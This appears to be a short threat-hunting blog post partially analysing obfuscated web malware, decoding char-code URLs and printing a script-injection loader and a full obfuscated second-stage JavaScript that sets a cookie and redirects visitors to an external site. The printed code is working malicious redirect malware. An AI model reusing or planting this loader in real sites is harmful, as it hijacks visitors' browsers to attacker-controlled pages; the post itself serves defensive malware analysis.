Analysis of Obfuscated PHP Malware

January 29, 2019 - A partial analysis of some obfuscated PHP.

I am monitoring the php decoder site here and was alerted when the decoded php here had a String.fromCharCode command in it. After decoding the character code (104, 116, 116, 112, 115, 58, 47, 47, 103, 101, 116, 109, 121, 99, 111, 110, 102, 105, 103, 112, 108, 101, 97, 115, 101, 46, 99, 111, 109, 47, 103, 101, 116, 46, 112, 104, 112)1, this produced https://getmyconfigplease[.]com/get[.]php. The content of this site looks like:

var sECIQY8TzC = document.createElement('script'); sECIQY8TzC.type = 'text/javascript'; sECIQY8TzC.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 112, 97, 115, 116, 101, 98, 105, 110, 46, 99, 111, 109, 47, 114, 97, 119, 47, 69, 110, 78, 75, 113, 71, 76, 78); document.head.appendChild(sECIQY8TzC);

Decoding the String.fromCharCode bit2 produces https://pastebin.com/raw/EnNKqGLN.

The content of this site is:

function _0x16ac9e(){var _0x11da69=['MHgy','MHgz','MHg0','MHg2','aHJlZg==','cmVwbGFjZQ==','bG9jYXRpb24=','aW5kZXhPZg==','Y29va2ll','QmVzdENvb2tpZT10cnVlOyBtYXgtYWdlPTIwNDAw','c2hpZnQ=','MHgw','MHgx'];(function(_0x538417,_0x48f8ea){var _0x350dbc=function(_0x2e576b){while(--_0x2e576b){_0x538417['push'](_0x538417['shift']());}};_0x350dbc(++_0x48f8ea);}(_0x11da69,0xd5));var _0x4097a7=function(_0x506a3d,_0x321114){_0x506a3d=_0x506a3d-0x0;var _0x32b6f7=_0x11da69[_0x506a3d];if(_0x4097a7['cNcBaR']===undefined){(function(){var _0x29eb7d;try{var _0x4e84d1=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');');_0x29eb7d=_0x4e84d1();}catch(_0x476c5c){_0x29eb7d=window;}var _0x3b1078='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x29eb7d['atob']||(_0x29eb7d['atob']=function(_0x2199f9){var _0x207876=String(_0x2199f9)['replace'](/=+$/,'');for(var _0x3d686c=0x0,_0x55acec,_0x22a388,_0x5795eb=0x0,_0x5c30ef='';_0x22a388=_0x207876['charAt'](_0x5795eb++);~_0x22a388&&(_0x55acec=_0x3d686c%0x4?_0x55acec*0x40+_0x22a388:_0x22a388,_0x3d686c++%0x4)?_0x5c30ef+=String['fromCharCode'](0xff&_0x55acec>>(-0x2*_0x3d686c&0x6)):0x0){_0x22a388=_0x3b1078['indexOf'](_0x22a388);}return _0x5c30ef;});}());_0x4097a7['qogRBP']=function(_0xd61dcf){var _0x10ae9e=atob(_0xd61dcf);var _0x3a9531=[];for(var _0x3a6320=0x0,_0x8d019b=_0x10ae9e['length'];_0x3a6320<_0x8d019b;_0x3a6320++){_0x3a9531+='%'+('00'+_0x10ae9e['charCodeAt'](_0x3a6320)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x3a9531);};_0x4097a7['KYlgqs']={};_0x4097a7['cNcBaR']=!![];}var _0x579681=_0x4097a7['KYlgqs'][_0x506a3d];if(_0x579681===undefined){_0x32b6f7=_0x4097a7['qogRBP'](_0x32b6f7);_0x4097a7['KYlgqs'][_0x506a3d]=_0x32b6f7;}else{_0x32b6f7=_0x579681;}return _0x32b6f7;};var _0x2be368=[_0x4097a7('0x0'),_0x4097a7('0x1'),'fromCharCode','BestCookie=true',_0x4097a7('0x2'),_0x4097a7('0x3'),_0x4097a7('0x4')];(function(_0x6e5b15,_0x2c75a3){var _0x42951f=function(_0x1975b5){while(--_0x1975b5){_0x6e5b15['push'](_0x6e5b15[_0x4097a7('0x5')]());}};_0x42951f(++_0x2c75a3);}(_0x2be368,0x1c9));var _0x4755cb=function(_0x5ad1ee,_0x39c6df){_0x5ad1ee=_0x5ad1ee-0x0;var _0x38bd4b=_0x2be368[_0x5ad1ee];return _0x38bd4b;};var _0x443bde=[_0x4755cb(_0x4097a7('0x6')),_0x4755cb(_0x4097a7('0x7')),_0x4755cb(_0x4097a7('0x8')),_0x4755cb(_0x4097a7('0x9')),_0x4755cb(_0x4097a7('0xa')),_0x4755cb('0x5'),_0x4755cb(_0x4097a7('0xb')),_0x4097a7('0xc')];var _0x4efd8b=String[_0x443bde[0x0]](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x66,0x6f,0x72,0x6d,0x79,0x6c,0x69,0x74,0x74,0x6c,0x65,0x73,0x69,0x74,0x65,0x2e,0x78,0x79,0x7a,0x2f,0x6c,0x69,0x74,0x74,0x6c,0x65,0x2e,0x70,0x68,0x70);if(document[_0x443bde[0x3]][_0x443bde[0x2]](_0x443bde[0x1])==-0x1){document[_0x443bde[0x3]]=_0x443bde[0x4];window[_0x443bde[0x6]][_0x443bde[0x5]](_0x4efd8b);document[_0x443bde[0x6]][_0x443bde[0x5]](_0x4efd8b);window[_0x443bde[0x6]][_0x443bde[0x7]]=_0x4efd8b;document[_0x443bde[0x6]][_0x443bde[0x7]]=_0x4efd8b;}}_0x16ac9e();

I have not fully analyzed this yet, but will hopefully do so soon and update this site.

This project was facilitated by Biblioteca… more information on this project is coming soon.


  • Threat Intelligence
  • Threat Hunting
  • Biblioteca